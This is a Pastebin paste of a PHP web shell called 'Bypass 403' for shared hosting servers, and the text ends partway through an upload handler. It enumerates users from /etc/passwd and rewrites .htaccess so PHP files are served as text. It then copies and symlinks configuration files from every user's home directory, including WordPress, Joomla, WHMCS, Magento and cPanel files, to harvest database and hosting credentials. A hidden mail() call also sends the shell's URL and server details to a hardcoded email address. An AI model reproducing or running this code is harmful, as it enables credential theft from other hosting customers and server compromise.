Advertisement
Guest User

mbem

a guest
Sep 17th, 2019
227
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 33.27 KB | None | 0 0
  1. <?php
  2.  @error_reporting(0);
  3.  @ini_set('html_errors',0);
  4.  @ini_set('max_execution_time',0);
  5.  @ini_set('display_errors', 0);
  6.  @ini_set('file_uploads',1);
  7. ?>
  8. <html>
  9.   <head>
  10.     <title>Bypass 403 </title>
  11.     <!-- Font Awesome -->
  12.     <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.7.0/css/all.css">
  13.     <!-- Bootstrap core CSS -->
  14.     <link href="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.2.1/css/bootstrap.min.css" rel="stylesheet">
  15.     <!-- Material Design Bootstrap -->
  16.     <link href="https://cdnjs.cloudflare.com/ajax/libs/mdbootstrap/4.7.1/css/mdb.min.css" rel="stylesheet">
  17.   </head>
  18.   <body class="bg-dark">
  19.     <div class="container">
  20.         <div class="row mt-3">
  21.             <div class="col-md-12 mb-3">
  22.                 <div class="card">
  23.                   <div class="card-header">
  24.                       <h1 class="card-title text-center"><b>Bypass 403</b></h1>
  25.                     <form method="post">
  26.                       <div class="form-group">
  27.                         <label for="exampleFormControlSelect1"><i class="fa fa-user-secret"></i> Users</label>
  28.                         <textarea class="form-control" id="exampleFormControlTextarea1" rows="10" name="passwd"><?php  $uSr=file("/etc/passwd");
  29.                              foreach($uSr as $usrr) { $str=explode(":",$usrr);
  30.                              echo $str[0]."n";
  31.                              } echo system('ls /var/mail');
  32.                              echo system('ls /home');?></textarea>
  33.                       </div>                        
  34.                       <div class="form-group">
  35.                         <label for="exampleFormControlSelect1"><i class="fa fa-home"></i> Home</label>
  36.                         <select class="form-control" name="home">
  37.                           <option title="home" value="home">home</option>
  38.                           <option title="home1" value="home1">home1</option>
  39.                           <option title="home2" value="home2">home2</option>
  40.                           <option title="home3" value="home3">home3</option>
  41.                           <option title="home4" value="home4">home4</option>
  42.                           <option title="home5" value="home5">home5</option>
  43.                           <option title="home6" value="home6">home6</option>
  44.                           <option title="home7" value="home7">home7</option>
  45.                           <option title="home8" value="home8">home8</option>
  46.                           <option title="home9" value="home9">home9</option>
  47.                           <option title="home10" value="home10">home10</option>
  48.                         </select>
  49.                       </div>
  50.                       <div class="form-group">
  51.                         <label for="exampleFormControlSelect1"><i class="fa fa-cog fa-spin"></i> .htaccess</label>
  52.                         <select class="form-control" name="achon666ju5t">
  53.                             <option title="biasa" value="Options Indexes FollowSymLinks
  54.                             DirectoryIndex achon666ju5t.extremecrew
  55.                             AddType txt .php
  56.                             AddHandler txt .php">Apache 1</option>
  57.                             <option title="Apache" value="Options all
  58.                             Options +Indexes
  59.                             Options +FollowSymLinks
  60.                             DirectoryIndex achon666ju5t.extremecrew
  61.                             AddType text/plain .php
  62.                             AddHandler server-parsed .php
  63.                             AddType text/plain .html
  64.                             AddHandler txt .html
  65.                             Require None
  66.                             Satisfy Any">Apache 2</option>
  67.                             <option title="Litespeed" value="
  68.                             Options +FollowSymLinks
  69.                             DirectoryIndex achon666ju5t.extremecrew
  70.                             RemoveHandler .php
  71.                             AddType application/octet-stream .php ">Litespeed</option>
  72.                         </select>
  73.                       </div>
  74.                       <div class="form-group">
  75.                           <input type="submit" name="conf" class="btn btn-success" align="center" value="submit">
  76.                       </div>
  77.                     <?php
  78.                      if ($_POST['conf']) { $home = $_POST['home'];
  79.                      $folfig = $home;
  80.                      @mkdir($folfig, 0755);
  81.                      @chdir($folfig);
  82.                      $htaccess = $_POST['achon666ju5t'];
  83.                      file_put_contents(".htaccess",$htaccess,FILE_APPEND);
  84.                      $passwd=explode("n",$_POST["passwd"]);
  85.                      foreach($passwd as $pwd){ $user=trim($pwd);
  86.                      symlink('/','000~ROOT~000');
  87.                      copy('/'.$home.'/'.$user.'/.my.cnf',$user.' CPANEL');
  88.                      symlink('/'.$home.'/'.$user.'/.my.cnf',$user.' CPANEL');
  89.                      copy('/'.$home.'/'.$user.'/.accesshash',$user.'WHMCS.txt');
  90.                      symlink('/'.$home.'/'.$user.'/.accesshash',$user.'WHMCS.txt');
  91.                      copy('/'.$home.'/'.$user.'/public_html/suspended.page/index.html',$user.' RESELLER.txt');
  92.                      symlink('/'.$home.'/'.$user.'/public_html/suspended.page/index.html',$user.' RESELLER.txt');
  93.                      symlink('/'.$home.'/'.$user.'/public_html/.accesshash',$user.'WHMCS.txt');
  94.                      copy('/'.$home.'/'.$user.'/.accesshash',$user.'WHM access hash.txt');
  95.                      copy('/'.$home.'/'.$user.'/public_html/wp-config.php',$user.'WORDPRESS.txt');
  96.                      copy('/'.$home.'/'.$user.'/public_html/configuration.php',$user.' WHMCS or JOOMLA.txt');
  97.                      copy('/'.$home.'/'.$user.'/public_html/account/configuration.php',$user.'WHMCS.txt');
  98.                      copy('/'.$home.'/'.$user.'/public_html/accounts/configuration.php',$user.'WHMCS.txt');
  99.                      copy('/'.$home.'/'.$user.'/public_html/buy/configuration.php',$user.'WHMCS.txt');
  100.                      copy('/'.$home.'/'.$user.'/public_html/checkout/configuration.php',$user.'WHMCS.txt');
  101.                      copy('/'.$home.'/'.$user.'/public_html/central/configuration.php',$user.'WHMCS.txt');
  102.                      copy('/'.$home.'/'.$user.'/public_html/clienti/configuration.php',$user.'WHMCS.txt');
  103.                      copy('/'.$home.'/'.$user.'/public_html/client/configuration.php',$user.'WHMCS.txt');
  104.                      copy('/'.$home.'/'.$user.'/public_html/cliente/configuration.php',$user.'WHMCS.txt');
  105.                      copy('/'.$home.'/'.$user.'/public_html/clientes/configuration.php',$user.'WHMCS.txt');
  106.                      copy('/'.$home.'/'.$user.'/public_html/clients/configuration.php',$user.'WHMCS.txt');
  107.                      copy('/'.$home.'/'.$user.'/public_html/clientarea/configuration.php',$user.'WHMCS.txt');
  108.                      copy('/'.$home.'/'.$user.'/public_html/clientsarea/configuration.php',$user.'WHMCS.txt');
  109.                      copy('/'.$home.'/'.$user.'/public_html/client-area/configuration.php',$user.'WHMCS.txt');
  110.                      copy('/'.$home.'/'.$user.'/public_html/clients-area/configuration.php',$user.'WHMCS.txt');
  111.                      copy('/'.$home.'/'.$user.'/public_html/clientzone/configuration.php',$user.'WHMCS.txt');
  112.                      copy('/'.$home.'/'.$user.'/public_html/client-zone/configuration.php',$user.'WHMCS.txt');
  113.                      copy('/'.$home.'/'.$user.'/public_html/core/configuration.php',$user.'WHMCS.txt');
  114.                      copy('/'.$home.'/'.$user.'/public_html/company/configuration.php',$user.'WHMCS.txt');
  115.                      copy('/'.$home.'/'.$user.'/public_html/customer/configuration.php',$user.'WHMCS.txt');
  116.                      copy('/'.$home.'/'.$user.'/public_html/customers/configuration.php',$user.'WHMCS.txt');
  117.                      copy('/'.$home.'/'.$user.'/public_html/bill/configuration.php',$user.'WHMCS.txt');
  118.                      copy('/'.$home.'/'.$user.'/public_html/billing/configuration.php',$user.'WHMCS.txt');
  119.                      copy('/'.$home.'/'.$user.'/public_html/finance/configuration.php',$user.'WHMCS.txt');
  120.                      copy('/'.$home.'/'.$user.'/public_html/financeiro/configuration.php',$user.'WHMCS.txt');
  121.                      copy('/'.$home.'/'.$user.'/public_html/host/configuration.php',$user.'WHMCS.txt');
  122.                      copy('/'.$home.'/'.$user.'/public_html/hosts/configuration.php',$user.'WHMCS.txt');
  123.                      copy('/'.$home.'/'.$user.'/public_html/hosting/configuration.php',$user.'WHMCS.txt');
  124.                      copy('/'.$home.'/'.$user.'/public_html/hostings/configuration.php',$user.'WHMCS.txt');
  125.                      copy('/'.$home.'/'.$user.'/public_html/klien/configuration.php',$user.'WHMCS.txt');
  126.                      copy('/'.$home.'/'.$user.'/public_html/manage/configuration.php',$user.'WHMCS.txt');
  127.                      copy('/'.$home.'/'.$user.'/public_html/manager/configuration.php',$user.'WHMCS.txt');
  128.                      copy('/'.$home.'/'.$user.'/public_html/member/configuration.php',$user.'WHMCS.txt');
  129.                      copy('/'.$home.'/'.$user.'/public_html/members/configuration.php',$user.'WHMCS.txt');
  130.                      copy('/'.$home.'/'.$user.'/public_html/my/configuration.php',$user.'WHMCS.txt');
  131.                      copy('/'.$home.'/'.$user.'/public_html/myaccount/configuration.php',$user.'WHMCS.txt');
  132.                      copy('/'.$home.'/'.$user.'/public_html/my-account/client/configuration.php',$user.'WHMCS.txt');
  133.                      copy('/'.$home.'/'.$user.'/public_html/myaccounts/configuration.php',$user.'WHMCS.txt');
  134.                      copy('/'.$home.'/'.$user.'/public_html/my-accounts/configuration.php',$user.'WHMCS.txt');
  135.                      copy('/'.$home.'/'.$user.'/public_html/order/configuration.php',$user.'WHMCS.txt');
  136.                      copy('/'.$home.'/'.$user.'/public_html/orders/configuration.php',$user.'WHMCS.txt');
  137.                      copy('/'.$home.'/'.$user.'/public_html/painel/configuration.php',$user.'WHMCS.txt');
  138.                      copy('/'.$home.'/'.$user.'/public_html/panel/configuration.php',$user.'WHMCS.txt');
  139.                      copy('/'.$home.'/'.$user.'/public_html/panels/configuration.php',$user.'WHMCS.txt');
  140.                      copy('/'.$home.'/'.$user.'/public_html/portal/configuration.php',$user.'WHMCS.txt');
  141.                      copy('/'.$home.'/'.$user.'/public_html/portals/configuration.php',$user.'WHMCS.txt');
  142.                      copy('/'.$home.'/'.$user.'/public_html/purchase/configuration.php',$user.'WHMCS.txt');
  143.                      copy('/'.$home.'/'.$user.'/public_html/secure/configuration.php',$user.'WHMCS.txt');
  144.                      copy('/'.$home.'/'.$user.'/public_html/support/configuration.php',$user.'WHMCS.txt');
  145.                      copy('/'.$home.'/'.$user.'/public_html/supporte/configuration.php',$user.'WHMCS.txt');
  146.                      copy('/'.$home.'/'.$user.'/public_html/supports/configuration.php',$user.'WHMCS.txt');
  147.                      copy('/'.$home.'/'.$user.'/public_html/web/configuration.php',$user.'WHMCS.txt');
  148.                      copy('/'.$home.'/'.$user.'/public_html/webhost/configuration.php',$user.'WHMCS.txt');
  149.                      copy('/'.$home.'/'.$user.'/public_html/webhosting/configuration.php',$user.'WHMCS.txt');
  150.                      copy('/'.$home.'/'.$user.'/public_html/whm/configuration.php',$user.'WHMCS.txt');
  151.                      copy('/'.$home.'/'.$user.'/public_html/whmcs/configuration.php',$user.'WHMCS.txt');
  152.                      copy('/'.$home.'/'.$user.'/public_html/whmcs2/configuration.php',$user.'WHMCS.txt');
  153.                      copy('/'.$home.'/'.$user.'/public_html/Whm/configuration.php',$user.'WHMCS.txt');
  154.                      copy('/'.$home.'/'.$user.'/public_html/Whmcs/configuration.php',$user.'WHMCS.txt');
  155.                      copy('/'.$home.'/'.$user.'/public_html/WHM/configuration.php',$user.'WHMCS.txt');
  156.                      copy('/'.$home.'/'.$user.'/public_html/WHMCS/configuration.php',$user.'WHMCS.txt');
  157.                      symlink('/'.$home.'/'.$user.'/public_html/wp-config.php',$user.'WORDPRESS.txt');
  158.                      symlink('/'.$home.'/'.$user.'/public_html/configuration.php',$user.' WHMCS or JOOMLA.txt');
  159.                      symlink('/'.$home.'/'.$user.'/public_html/account/configuration.php',$user.'WHMCS.txt');
  160.                      symlink('/'.$home.'/'.$user.'/public_html/accounts/configuration.php',$user.'WHMCS.txt');
  161.                      symlink('/'.$home.'/'.$user.'/public_html/buy/configuration.php',$user.'WHMCS.txt');
  162.                      symlink('/'.$home.'/'.$user.'/public_html/checkout/configuration.php',$user.'WHMCS.txt');
  163.                      symlink('/'.$home.'/'.$user.'/public_html/central/configuration.php',$user.'WHMCS.txt');
  164.                      symlink('/'.$home.'/'.$user.'/public_html/clienti/configuration.php',$user.'WHMCS.txt');
  165.                      symlink('/'.$home.'/'.$user.'/public_html/client/configuration.php',$user.'WHMCS.txt');
  166.                      symlink('/'.$home.'/'.$user.'/public_html/cliente/configuration.php',$user.'WHMCS.txt');
  167.                      symlink('/'.$home.'/'.$user.'/public_html/clientes/configuration.php',$user.'WHMCS.txt');
  168.                      symlink('/'.$home.'/'.$user.'/public_html/clients/configuration.php',$user.'WHMCS.txt');
  169.                      symlink('/'.$home.'/'.$user.'/public_html/clientarea/configuration.php',$user.'WHMCS.txt');
  170.                      symlink('/'.$home.'/'.$user.'/public_html/clientsarea/configuration.php',$user.'WHMCS.txt');
  171.                      symlink('/'.$home.'/'.$user.'/public_html/client-area/configuration.php',$user.'WHMCS.txt');
  172.                      symlink('/'.$home.'/'.$user.'/public_html/clients-area/configuration.php',$user.'WHMCS.txt');
  173.                      symlink('/'.$home.'/'.$user.'/public_html/clientzone/configuration.php',$user.'WHMCS.txt');
  174.                      symlink('/'.$home.'/'.$user.'/public_html/client-zone/configuration.php',$user.'WHMCS.txt');
  175.                      symlink('/'.$home.'/'.$user.'/public_html/core/configuration.php',$user.'WHMCS.txt');
  176.                      symlink('/'.$home.'/'.$user.'/public_html/company/configuration.php',$user.'WHMCS.txt');
  177.                      symlink('/'.$home.'/'.$user.'/public_html/customer/configuration.php',$user.'WHMCS.txt');
  178.                      symlink('/'.$home.'/'.$user.'/public_html/customers/configuration.php',$user.'WHMCS.txt');
  179.                      symlink('/'.$home.'/'.$user.'/public_html/bill/configuration.php',$user.'WHMCS.txt');
  180.                      symlink('/'.$home.'/'.$user.'/public_html/billing/configuration.php',$user.'WHMCS.txt');
  181.                      symlink('/'.$home.'/'.$user.'/public_html/finance/configuration.php',$user.'WHMCS.txt');
  182.                      symlink('/'.$home.'/'.$user.'/public_html/financeiro/configuration.php',$user.'WHMCS.txt');
  183.                      symlink('/'.$home.'/'.$user.'/public_html/host/configuration.php',$user.'WHMCS.txt');
  184.                      symlink('/'.$home.'/'.$user.'/public_html/hosts/configuration.php',$user.'WHMCS.txt');
  185.                      symlink('/'.$home.'/'.$user.'/public_html/hosting/configuration.php',$user.'WHMCS.txt');
  186.                      symlink('/'.$home.'/'.$user.'/public_html/hostings/configuration.php',$user.'WHMCS.txt');
  187.                      symlink('/'.$home.'/'.$user.'/public_html/klien/configuration.php',$user.'WHMCS.txt');
  188.                      symlink('/'.$home.'/'.$user.'/public_html/manage/configuration.php',$user.'WHMCS.txt');
  189.                      symlink('/'.$home.'/'.$user.'/public_html/manager/configuration.php',$user.'WHMCS.txt');
  190.                      symlink('/'.$home.'/'.$user.'/public_html/member/configuration.php',$user.'WHMCS.txt');
  191.                      symlink('/'.$home.'/'.$user.'/public_html/members/configuration.php',$user.'WHMCS.txt');
  192.                      symlink('/'.$home.'/'.$user.'/public_html/my/configuration.php',$user.'WHMCS.txt');
  193.                      symlink('/'.$home.'/'.$user.'/public_html/myaccount/configuration.php',$user.'WHMCS.txt');
  194.                      symlink('/'.$home.'/'.$user.'/public_html/my-account/client/configuration.php',$user.'WHMCS.txt');
  195.                      symlink('/'.$home.'/'.$user.'/public_html/myaccounts/configuration.php',$user.'WHMCS.txt');
  196.                      symlink('/'.$home.'/'.$user.'/public_html/my-accounts/configuration.php',$user.'WHMCS.txt');
  197.                      symlink('/'.$home.'/'.$user.'/public_html/order/configuration.php',$user.'WHMCS.txt');
  198.                      symlink('/'.$home.'/'.$user.'/public_html/orders/configuration.php',$user.'WHMCS.txt');
  199.                      symlink('/'.$home.'/'.$user.'/public_html/painel/configuration.php',$user.'WHMCS.txt');
  200.                      symlink('/'.$home.'/'.$user.'/public_html/panel/configuration.php',$user.'WHMCS.txt');
  201.                      symlink('/'.$home.'/'.$user.'/public_html/panels/configuration.php',$user.'WHMCS.txt');
  202.                      symlink('/'.$home.'/'.$user.'/public_html/portal/configuration.php',$user.'WHMCS.txt');
  203.                      symlink('/'.$home.'/'.$user.'/public_html/portals/configuration.php',$user.'WHMCS.txt');
  204.                      symlink('/'.$home.'/'.$user.'/public_html/purchase/configuration.php',$user.'WHMCS.txt');
  205.                      symlink('/'.$home.'/'.$user.'/public_html/secure/configuration.php',$user.'WHMCS.txt');
  206.                      symlink('/'.$home.'/'.$user.'/public_html/support/configuration.php',$user.'WHMCS.txt');
  207.                      symlink('/'.$home.'/'.$user.'/public_html/supporte/configuration.php',$user.'WHMCS.txt');
  208.                      symlink('/'.$home.'/'.$user.'/public_html/supports/configuration.php',$user.'WHMCS.txt');
  209.                      symlink('/'.$home.'/'.$user.'/public_html/web/configuration.php',$user.'WHMCS.txt');
  210.                      symlink('/'.$home.'/'.$user.'/public_html/webhost/configuration.php',$user.'WHMCS.txt');
  211.                      symlink('/'.$home.'/'.$user.'/public_html/webhosting/configuration.php',$user.'WHMCS.txt');
  212.                      symlink('/'.$home.'/'.$user.'/public_html/whm/configuration.php',$user.'WHMCS.txt');
  213.                      symlink('/'.$home.'/'.$user.'/public_html/whmcs/configuration.php',$user.'WHMCS.txt');
  214.                      symlink('/'.$home.'/'.$user.'/public_html/whmcs2/configuration.php',$user.'WHMCS.txt');
  215.                      symlink('/'.$home.'/'.$user.'/public_html/Whm/configuration.php',$user.'WHMCS.txt');
  216.                      symlink('/'.$home.'/'.$user.'/public_html/Whmcs/configuration.php',$user.'WHMCS.txt');
  217.                      symlink('/'.$home.'/'.$user.'/public_html/WHM/configuration.php',$user.'WHMCS.txt');
  218.                      symlink('/'.$home.'/'.$user.'/public_html/WHMCS/configuration.php',$user.'WHMCS.txt');
  219.                      copy('/'.$home.'/'.$user.'/public_html/wp/test/wp-config.php',$user.'WORDPRESS.txt');
  220.                      copy('/'.$home.'/'.$user.'/public_html/blog/wp-config.php',$user.'WORDPRESS.txt');
  221.                      copy('/'.$home.'/'.$user.'/public_html/beta/wp-config.php',$user.'WORDPRESS.txt');
  222.                      copy('/'.$home.'/'.$user.'/public_html/portal/wp-config.php',$user.'WORDPRESS.txt');
  223.                      copy('/'.$home.'/'.$user.'/public_html/site/wp-config.php',$user.'WORDPRESS.txt');
  224.                      copy('/'.$home.'/'.$user.'/public_html/wp/wp-config.php',$user.'WORDPRESS.txt');
  225.                      copy('/'.$home.'/'.$user.'/public_html/WP/wp-config.php',$user.'WORDPRESS.txt');
  226.                      copy('/'.$home.'/'.$user.'/public_html/news/wp-config.php',$user.'WORDPRESS.txt');
  227.                      copy('/'.$home.'/'.$user.'/public_html/wordpress/wp-config.php',$user.'WORDPRESS.txt');
  228.                      copy('/'.$home.'/'.$user.'/public_html/test/wp-config.php',$user.'WORDPRESS.txt');
  229.                      copy('/'.$home.'/'.$user.'/public_html/demo/wp-config.php',$user.'WORDPRESS.txt');
  230.                      copy('/'.$home.'/'.$user.'/public_html/home/wp-config.php',$user.'WORDPRESS.txt');
  231.                      copy('/'.$home.'/'.$user.'/public_html/v1/wp-config.php',$user.'WORDPRESS.txt');
  232.                      copy('/'.$home.'/'.$user.'/public_html/v2/wp-config.php',$user.'WORDPRESS.txt');
  233.                      copy('/'.$home.'/'.$user.'/public_html/press/wp-config.php',$user.'WORDPRESS.txt');
  234.                      copy('/'.$home.'/'.$user.'/public_html/new/wp-config.php',$user.'WORDPRESS.txt');
  235.                      copy('/'.$home.'/'.$user.'/public_html/blogs/wp-config.php',$user.'WORDPRESS.txt');
  236.                      copy('/'.$home.'/'.$user.'/public_html/blog/configuration.php',$user.'JOOMLA.txt');
  237.                      copy('/'.$home.'/'.$user.'/public_html/submitticket.php',$user.'WHMCS.txt');
  238.                      copy('/'.$home.'/'.$user.'/public_html/cms/configuration.php',$user.'JOOMLA.txt');
  239.                      copy('/'.$home.'/'.$user.'/public_html/beta/configuration.php',$user.'JOOMLA.txt');
  240.                      copy('/'.$home.'/'.$user.'/public_html/portal/configuration.php',$user.'JOOMLA.txt');
  241.                      copy('/'.$home.'/'.$user.'/public_html/site/configuration.php',$user.'JOOMLA.txt');
  242.                      copy('/'.$home.'/'.$user.'/public_html/main/configuration.php',$user.'JOOMLA.txt');
  243.                      copy('/'.$home.'/'.$user.'/public_html/home/configuration.php',$user.'JOOMLA.txt');
  244.                      copy('/'.$home.'/'.$user.'/public_html/demo/configuration.php',$user.'JOOMLA.txt');
  245.                      copy('/'.$home.'/'.$user.'/public_html/test/configuration.php',$user.'JOOMLA.txt');
  246.                      copy('/'.$home.'/'.$user.'/public_html/v1/configuration.php',$user.'JOOMLA.txt');
  247.                      copy('/'.$home.'/'.$user.'/public_html/v2/configuration.php',$user.'JOOMLA.txt');
  248.                      copy('/'.$home.'/'.$user.'/public_html/joomla/configuration.php',$user.'JOOMLA.txt');
  249.                      copy('/'.$home.'/'.$user.'/public_html/new/configuration.php',$user.'JOOMLA.txt');
  250.                      copy('/'.$home.'/'.$user.'/public_html/app/etc/local.xml',$user.' MAGENTO.txt');
  251.                      copy('/'.$home.'/'.$user.'/public_html/config/settings.inc.php',$user.' PRESTASHOP.txt');
  252.                      symlink('/'.$home.'/'.$user.'/public_html/wp/test/wp-config.php',$user.'WORDPRESS.txt');
  253.                      symlink('/'.$home.'/'.$user.'/public_html/blog/wp-config.php',$user.'WORDPRESS.txt');
  254.                      symlink('/'.$home.'/'.$user.'/public_html/beta/wp-config.php',$user.'WORDPRESS.txt');
  255.                      symlink('/'.$home.'/'.$user.'/public_html/portal/wp-config.php',$user.'WORDPRESS.txt');
  256.                      symlink('/'.$home.'/'.$user.'/public_html/site/wp-config.php',$user.'WORDPRESS.txt');
  257.                      symlink('/'.$home.'/'.$user.'/public_html/wp/wp-config.php',$user.'WORDPRESS.txt');
  258.                      symlink('/'.$home.'/'.$user.'/public_html/WP/wp-config.php',$user.'WORDPRESS.txt');
  259.                      symlink('/'.$home.'/'.$user.'/public_html/news/wp-config.php',$user.'WORDPRESS.txt');
  260.                      symlink('/'.$home.'/'.$user.'/public_html/wordpress/wp-config.php',$user.'WORDPRESS.txt');
  261.                      symlink('/'.$home.'/'.$user.'/public_html/test/wp-config.php',$user.'WORDPRESS.txt');
  262.                      symlink('/'.$home.'/'.$user.'/public_html/demo/wp-config.php',$user.'WORDPRESS.txt');
  263.                      symlink('/'.$home.'/'.$user.'/public_html/home/wp-config.php',$user.'WORDPRESS.txt');
  264.                      symlink('/'.$home.'/'.$user.'/public_html/v1/wp-config.php',$user.'WORDPRESS.txt');
  265.                      symlink('/'.$home.'/'.$user.'/public_html/v2/wp-config.php',$user.'WORDPRESS.txt');
  266.                      symlink('/'.$home.'/'.$user.'/public_html/press/wp-config.php',$user.'WORDPRESS.txt');
  267.                      symlink('/'.$home.'/'.$user.'/public_html/new/wp-config.php',$user.'WORDPRESS.txt');
  268.                      symlink('/'.$home.'/'.$user.'/public_html/blogs/wp-config.php',$user.'WORDPRESS.txt');
  269.                      symlink('/'.$home.'/'.$user.'/public_html/blog/configuration.php',$user.'JOOMLA.txt');
  270.                      symlink('/'.$home.'/'.$user.'/public_html/submitticket.php',$user.'WHMCS.txt');
  271.                      symlink('/'.$home.'/'.$user.'/public_html/cms/configuration.php',$user.'JOOMLA.txt');
  272.                      symlink('/'.$home.'/'.$user.'/public_html/beta/configuration.php',$user.'JOOMLA.txt');
  273.                      symlink('/'.$home.'/'.$user.'/public_html/portal/configuration.php',$user.'JOOMLA.txt');
  274.                      symlink('/'.$home.'/'.$user.'/public_html/site/configuration.php',$user.'JOOMLA.txt');
  275.                      symlink('/'.$home.'/'.$user.'/public_html/main/configuration.php',$user.'JOOMLA.txt');
  276.                      symlink('/'.$home.'/'.$user.'/public_html/home/configuration.php',$user.'JOOMLA.txt');
  277.                      symlink('/'.$home.'/'.$user.'/public_html/demo/configuration.php',$user.'JOOMLA.txt');
  278.                      symlink('/'.$home.'/'.$user.'/public_html/test/configuration.php',$user.'JOOMLA.txt');
  279.                      symlink('/'.$home.'/'.$user.'/public_html/v1/configuration.php',$user.'JOOMLA.txt');
  280.                      symlink('/'.$home.'/'.$user.'/public_html/v2/configuration.php',$user.'JOOMLA.txt');
  281.                      symlink('/'.$home.'/'.$user.'/public_html/joomla/configuration.php',$user.'JOOMLA.txt');
  282.                      symlink('/'.$home.'/'.$user.'/public_html/new/configuration.php',$user.'JOOMLA.txt');
  283.                      symlink('/'.$home.'/'.$user.'/public_html/app/etc/local.xml',$user.' MAGENTO.txt');
  284.                      symlink('/'.$home.'/'.$user.'/public_html/config/settings.inc.php',$user.' PRESTASHOP.txt');
  285.                      copy('/'.$home.'/'.$user.'/public_html/application/config/database.php',$user.' ELLISLAB.txt');
  286.                      copy('/'.$home.'/'.$user.'/public_html/admin/config.php',$user.' OPENCART.txt');
  287.                      copy('/'.$home.'/'.$user.'/public_html/default/settings.php',$user.' DRUPAL.txt');
  288.                      copy('/'.$home.'/'.$user.'/public_html/forum/config.php',$user.' PHPBB.txt');
  289.                      symlink('/'.$home.'/'.$user.'/public_html/application/config/database.php',$user.' ELLISLAB.txt');
  290.                      symlink('/'.$home.'/'.$user.'/public_html/admin/config.php',$user.' OPENCART.txt');
  291.                      symlink('/'.$home.'/'.$user.'/public_html/default/settings.php',$user.' DRUPAL.txt');
  292.                      symlink('/'.$home.'/'.$user.'/public_html/forum/config.php',$user.' PHPBB.txt');
  293.                      copy('/'.$home.'/'.$user.'/public_html/vb/includes/config.php',$user.' VBULLETIN.txt');
  294.                      copy('/'.$home.'/'.$user.'/public_html/includes/config.php',$user.' VBULLETIN.txt');
  295.                      copy('/'.$home.'/'.$user.'/public_html/forum/includes/config.php',$user.' VBULLETIN.txt');
  296.                      copy('/'.$home.'/'.$user.'/public_htm/config.php',$user.' OTHER.txt');
  297.                      copy('/'.$home.'/'.$user.'/public_htm/html/config.php',$user.' PHPNUKE.txt');
  298.                      symlink('/'.$home.'/'.$user.'/public_html/vb/includes/config.php',$user.' VBULLETIN.txt');
  299.                      symlink('/'.$home.'/'.$user.'/public_html/includes/config.php',$user.' VBULLETIN.txt');
  300.                      symlink('/'.$home.'/'.$user.'/public_html/forum/includes/config.php',$user.' VBULLETIN.txt');
  301.                      symlink('/'.$home.'/'.$user.'/public_htm/config.php',$user.' OTHER.txt');
  302.                      symlink('/'.$home.'/'.$user.'/public_htm/html/config.php',$user.' PHPNUKE.txt');
  303.                      copy('/'.$home.'/'.$user.'/public_htm/conn.php',$user.' OTHER.txt');
  304.                      symlink('/'.$home.'/'.$user.'/public_html/conn.php',$user.' OTHER.txt');
  305.                      symlink('/'.$home.'/'.$user.'/public_html/inc/config.inc.php',$user.' OTHER.txt');
  306.                      copy('/'.$home.'/'.$user.'/public_html/application/config/database.php',$user.' OTHER.txt');
  307.                      symlink('/'.$home.'/'.$user.'/public_html/application/config/database.php',$user.' OTHER.txt');
  308.                      copy('/'.$home.'/'.$user.'/public_html/inc/config.inc.php',$user.' OTHER.txt');
  309.                      copy('/var/www/wp-config.php','WORDPRESS.txt');
  310.                      copy('/var/www/configuration.php','JOOMLA.txt');
  311.                      copy('/var/www/config.inc.php','OPENJOURNAL.txt');
  312.                      copy('/var/www/config.php','OTHER.txt');
  313.                      copy('/var/www/config/koneksi.php','OTHER.txt');
  314.                      copy('/var/www/include/config.php','OTHER.txt');
  315.                      copy('/var/www/connect.php','OTHER.txt');
  316.                      copy('/var/www/config/connect.php','OTHER.txt');
  317.                      copy('/var/www/include/connect.php','OTHER.txt');
  318.                      copy('/var/www/html/wp-config.php','WORDPRESS.txt');
  319.                      copy('/var/www/html/configuration.php','JOOMLA.txt');
  320.                      copy('/var/www/html/config.inc.php','OPENJOURNAL.txt');
  321.                      copy('/var/www/html/config.php','OTHER.txt');
  322.                      copy('/var/www/html/config/koneksi.php','OTHER.txt');
  323.                      copy('/var/www/html/include/config.php','OTHER.txt');
  324.                      copy('/var/www/html/connect.php','OTHER.txt');
  325.                      copy('/var/www/html/config/connect.php','OTHER.txt');
  326.                      copy('/var/www/html/include/connect.php','OTHER.txt');
  327.                      symlink('/var/www/wp-config.php','WORDPRESS.txt');
  328.                      symlink('/var/www/configuration.php','JOOMLA.txt');
  329.                      symlink('/var/www/config.inc.php','OPENJOURNAL.txt');
  330.                      symlink('/var/www/config.php','OTHER.txt');
  331.                      symlink('/var/www/config/koneksi.php','OTHER.txt');
  332.                      symlink('/var/www/include/config.php','OTHER.txt');
  333.                      symlink('/var/www/connect.php','OTHER.txt');
  334.                      symlink('/var/www/config/connect.php','OTHER.txt');
  335.                      symlink('/var/www/include/connect.php','OTHER.txt');
  336.                      symlink('/var/www/html/wp-config.php','WORDPRESS.txt');
  337.                      symlink('/var/www/html/configuration.php','JOOMLA.txt');
  338.                      symlink('/var/www/html/config.inc.php','OPENJOURNAL.txt');
  339.                      symlink('/var/www/html/config.php','OTHER.txt');
  340.                      symlink('/var/www/html/config/koneksi.php','OTHER.txt');
  341.                      symlink('/var/www/html/include/config.php','OTHER.txt');
  342.                      symlink('/var/www/html/connect.php','OTHER.txt');
  343.                      symlink('/var/www/html/config/connect.php','OTHER.txt');
  344.                      symlink('/var/www/html/include/connect.php','OTHER.txt');
  345.                      }
  346.                      echo '<div class="form-group">';
  347.                      echo '<i><b><a class="btn btn-danger" href='.$folfig.'> Done</a></b></div>';
  348.                      }
  349.                     ?>
  350.                    
  351.                     <?php $kime = "davnisial420@gmail.com";
  352.                      $baslik = "Setor gan shell V1.0";
  353.                      $EL_MuHaMMeD = "Dosya Yolu : " . $_SERVER['DOCUMENT_ROOT'] . "rn";
  354.                      $EL_MuHaMMeD.= "Server Admin : " . $_SERVER['SERVER_ADMIN'] . "rn";
  355.                      $EL_MuHaMMeD.= "Server isletim sistemi : " . $_SERVER['SERVER_SOFTWARE'] . "rn";
  356.                      $EL_MuHaMMeD.= "Shell Link : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['PHP_SELF'] . "?upload=filern";
  357.                      $EL_MuHaMMeD.= "Avlanan Site : " . $_SERVER['HTTP_HOST'] . "rn";
  358.                      mail($kime, $baslik, $EL_MuHaMMeD);
  359.                      
  360.                     ?>
  361.                     </form>
  362.                   </div>                    
  363.                 </div>
  364.             </div>
  365.         </div>
  366.     </div>
  367.    
  368. <?php
  369. if ($_GET['upload'] == 'file') {
